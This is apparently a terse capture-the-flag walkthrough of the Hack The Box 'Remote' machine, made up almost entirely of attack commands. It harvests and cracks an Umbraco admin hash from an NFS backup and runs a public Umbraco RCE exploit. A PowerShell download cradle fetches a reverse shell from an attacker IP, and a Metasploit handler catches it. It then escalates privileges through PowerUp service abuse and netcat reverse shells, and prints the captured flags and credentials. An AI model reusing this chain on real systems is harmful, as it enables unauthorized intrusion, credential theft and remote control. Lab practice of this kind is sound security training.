> mount nfs disk

$ sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

> searching...
> found the correct file : /mnt/App_Data/Umbraco.sdf
> Read file 

$ strings Umbraco.sdf | grep admin

> found this connent : adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
> decrypt hash : b8be16afba8c314ad33d812f22a04991b90e2aaa
> creds for Umbraco : admin@htb.local:baconandcheese
> find cve to exploit umbraco
> link : https://github.com/noraj/Umbraco-RCE

$ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py -O umbraco_cve.py
$ chmod 775 umbraco_cve.py
$ ./umbraco_cve.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c ipconfig
$ msfconsole
	> use exploit/multi/handler
	> set payload payload/windows/x64/shell_reverse_tcp
	> set LHOST 10.10.15.69
	> set ExitOnSession false
	> exploit -j
$ ./umbraco_cve.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.244/mini-reverse.ps1')"

PS C:\users\Public> type user.txt
e1f59fd6e3d84a858994692447bf9bf3

> invoke-webrequest -Uri http://10.10.15.244/PowerUp.ps1 -OutFile powerup.ps1
> Import-Module powerup.ps1
> invoke-webrequest -Uri http://10.10.15.244/nc64.exe -OutFile c:\temp\nc64.exe
> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\temp\nc64.exe -e cmd.exe 10.10.15.244 2222"
> c:\temp\nc64.exe -e cmd.exe 10.10.15.244 1111
> C:\Windows\system32>type c:\users\administrator\desktop\root.txt
	type c:\users\administrator\desktop\root.txt
	b3dc8337598f5b3051230d4985051f05